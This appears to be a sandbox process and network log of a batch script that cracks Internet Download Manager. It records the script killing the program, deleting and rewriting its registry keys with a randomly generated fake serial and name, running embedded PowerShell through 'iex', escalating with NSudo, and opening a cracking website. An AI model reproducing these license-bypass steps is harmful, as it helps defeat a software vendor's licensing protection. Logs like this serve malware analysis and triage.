"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3612.3.716397103\787830283" -childID 2 -isForBrowser -prefsHandle 3640 -prefMapHandle 3636 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8c2c8c8-4525-4e0f-b97d-93a70de89fbd} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" 3652 1e059ac0e58 tab
C:\Windows\System32\grpconv.exe
"C:\Windows\System32\grpconv.exe" -o
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3612.4.1101186590\1876602835" -childID 3 -isForBrowser -prefsHandle 4920 -prefMapHandle 4924 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2e38dd7-9dd3-4c31-a221-feab76bd227d} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" 4916 1e05b444058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3612.5.643982186\1374384725" -childID 4 -isForBrowser -prefsHandle 5316 -prefMapHandle 5312 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c89fbf6-fc96-44c4-8589-f066e3227a42} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" 5240 1e05b444958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3612.6.366531478\43865912" -childID 5 -isForBrowser -prefsHandle 5504 -prefMapHandle 5500 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f5027aa-08fd-4ca4-99f0-221e2e8eda20} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" 5512 1e05bd3eb58 tab
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3612.7.1633723908\839896424" -childID 6 -isForBrowser -prefsHandle 4896 -prefMapHandle 4932 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {064166dc-1339-45fd-9799-1586ce03e24c} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" 3152 1e054570c58 tab
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Program Files (x86)\Internet Download Manager\MediumILStart.exe
"C:\Program Files (x86)\Internet Download Manager\MediumILStart.exe"
C:\Program Files (x86)\Internet Download Manager\IDMan.exe
"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" -Embedding
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Program Files (x86)\Internet Download Manager\Uninstall.exe
"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\system32\RUNDLL32.EXE
"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf
C:\Windows\system32\DrvInst.exe
DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\idmwfp.inf_amd64_8b0ebbc2b4585464\idmwfp.inf" "0" "4fc2928b3" "0000000000000158" "WinSta0\Default"
C:\Windows\system32\runonce.exe
"C:\Windows\system32\runonce.exe" -r
C:\Windows\System32\grpconv.exe
"C:\Windows\System32\grpconv.exe" -o
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\System32\mode.com
mode 113, 35
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 1 internetdownloadmanager.com
C:\Windows\System32\PING.EXE
ping -n 1 internetdownloadmanager.com
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 2>nul
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
C:\Windows\System32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ver
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\DownloadManager" /v idmvers 2>nul
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\DownloadManager" /v idmvers
C:\Windows\System32\tasklist.exe
tasklist /fi "imagename eq idman.exe"
C:\Windows\System32\findstr.exe
findstr /i "idman.exe"
C:\Windows\System32\taskkill.exe
taskkill /f /im idman.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"
C:\Windows\System32\reg.exe
reg export HKCU\Software\Classes\Wow6432Node\CLSID "C:\Windows\Temp\_Backup_HKCU_CLSID_20240501-053139735.reg"
C:\Windows\System32\reg.exe
reg query "HKCU\Software\DownloadManager" "/v" "FName"
C:\Windows\System32\reg.exe
reg query "HKCU\Software\DownloadManager" "/v" "LName"
C:\Windows\System32\reg.exe
reg query "HKCU\Software\DownloadManager" "/v" "Email"
C:\Windows\System32\reg.exe
reg query "HKCU\Software\DownloadManager" "/v" "Serial"
C:\Windows\System32\reg.exe
reg query "HKCU\Software\DownloadManager" "/v" "scansk"
C:\Windows\System32\reg.exe
reg query "HKCU\Software\DownloadManager" "/v" "tvfrdt"
C:\Windows\System32\reg.exe
reg query "HKCU\Software\DownloadManager" "/v" "radxcnt"
C:\Windows\System32\reg.exe
reg delete "HKCU\Software\DownloadManager" "/v" "radxcnt" /f
C:\Windows\System32\reg.exe
reg query "HKCU\Software\DownloadManager" "/v" "LstCheck"
C:\Windows\System32\reg.exe
reg delete "HKCU\Software\DownloadManager" "/v" "LstCheck" /f
C:\Windows\System32\reg.exe
reg query "HKCU\Software\DownloadManager" "/v" "ptrk_scdt"
C:\Windows\System32\reg.exe
reg query "HKCU\Software\DownloadManager" "/v" "LastCheckQU"
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager"
C:\Windows\System32\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /f
C:\Windows\System32\reg.exe
reg add "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /v "AdvIntDriverEnabled2" /t REG_DWORD /d "1" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$sid = 'S-1-5-21-1230210488-3096403634-4129516247-1000'; $HKCUsync = 1; $lockKey = 1; $deleteKey = $null; $toggle = 1; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe "$key = -join ((Get-Random -Count 20 -InputObject ([char[]]('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'))));$key = ($key.Substring(0, 5) + '-' + $key.Substring(5, 5) + '-' + $key.Substring(10, 5) + '-' + $key.Substring(15, 5) + $key.Substring(20));Write-Output $key" 2>nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$key = -join ((Get-Random -Count 20 -InputObject ([char[]]('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'))));$key = ($key.Substring(0, 5) + '-' + $key.Substring(5, 5) + '-' + $key.Substring(10, 5) + '-' + $key.Substring(15, 5) + $key.Substring(20));Write-Output $key"
C:\Windows\System32\reg.exe
reg add HKCU\SOFTWARE\DownloadManager /v FName /t REG_SZ /d "1512"
C:\Windows\System32\reg.exe
reg add HKCU\SOFTWARE\DownloadManager /v LName /t REG_SZ /d "9509"
C:\Windows\System32\reg.exe
reg add HKCU\SOFTWARE\DownloadManager /v Email /t REG_SZ /d "[email protected]"
C:\Windows\System32\reg.exe
reg add HKCU\SOFTWARE\DownloadManager /v Serial /t REG_SZ /d "HKY20-T1SEO-6B8X3-WMFD4"
C:\Program Files (x86)\Internet Download Manager\IDMan.exe
"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/images/idm_box_min.png" /p "C:\Windows\Temp" /f temp.png
C:\Windows\System32\timeout.exe
timeout /t 1
C:\Windows\System32\timeout.exe
timeout /t 1
C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe
"C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe" -runcm
C:\Program Files (x86)\Internet Download Manager\Uninstall.exe
"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv
C:\Windows\system32\RUNDLL32.EXE
"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf
C:\Windows\system32\DrvInst.exe
DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\idmwfp.inf_amd64_8b0ebbc2b4585464\idmwfp.inf" "0" "4fc2928b3" "000000000000018C" "WinSta0\Default"
C:\Windows\system32\runonce.exe
"C:\Windows\system32\runonce.exe" -r
C:\Windows\System32\grpconv.exe
"C:\Windows\System32\grpconv.exe" -o
C:\Windows\System32\timeout.exe
timeout /t 1
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\System32\timeout.exe
timeout /t 1
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\System32\timeout.exe
timeout /t 1
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\System32\timeout.exe
timeout /t 1
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"
C:\Windows\System32\timeout.exe
timeout /t 1
C:\Program Files (x86)\Internet Download Manager\IDMan.exe
"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/register/IDMlib/images/idman_logos.png" /p "C:\Windows\Temp" /f temp.png
C:\Windows\System32\timeout.exe
timeout /t 1
C:\Program Files (x86)\Internet Download Manager\IDMan.exe
"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/pictures/idm_about.png" /p "C:\Windows\Temp" /f temp.png
C:\Windows\System32\timeout.exe
timeout /t 1
C:\Windows\System32\timeout.exe
timeout /t 1
C:\Windows\System32\timeout.exe
timeout /t 3
C:\Windows\System32\tasklist.exe
tasklist /fi "imagename eq idman.exe"
C:\Windows\System32\findstr.exe
findstr /i "idman.exe"
C:\Windows\System32\taskkill.exe
taskkill /f /im idman.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$sid = 'S-1-5-21-1230210488-3096403634-4129516247-1000'; $HKCUsync = 1; $lockKey = 1; $deleteKey = $null; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"
C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe
NSudo86x -U:C -P:E -UseCurrentConsole "C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot
C:\Program Files (x86)\Internet Download Manager\IDMan.exe
"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.crackingcity.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd0d913cb8,0x7ffd0d913cc8,0x7ffd0d913cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3952 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3948 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4312 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4972 /prefetch:8
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3556 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
C:\Program Files (x86)\Internet Download Manager\Uninstall.exe
"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv
C:\Windows\system32\RUNDLL32.EXE
"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf
C:\Windows\system32\DrvInst.exe
DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\idmwfp.inf_amd64_8b0ebbc2b4585464\idmwfp.inf" "0" "4fc2928b3" "0000000000000190" "WinSta0\Default"
C:\Windows\system32\runonce.exe
"C:\Windows\system32\runonce.exe" -r
C:\Windows\System32\grpconv.exe
"C:\Windows\System32\grpconv.exe" -o
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\net.exe
"C:\Windows\System32\net.exe" start IDMWFP
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start IDMWFP
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,10898365566892269429,10704285812447192574,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5060 /prefetch:2
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa394a855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.crackingcity.com | udp |
| US | 172.67.187.136:443 | www.crackingcity.com | tcp |
| US | 8.8.8.8:53 | 136.187.67.172.in-addr.arpa | udp |
| US | 169.61.27.133:443 | internetdownloadmanager.com | tcp |
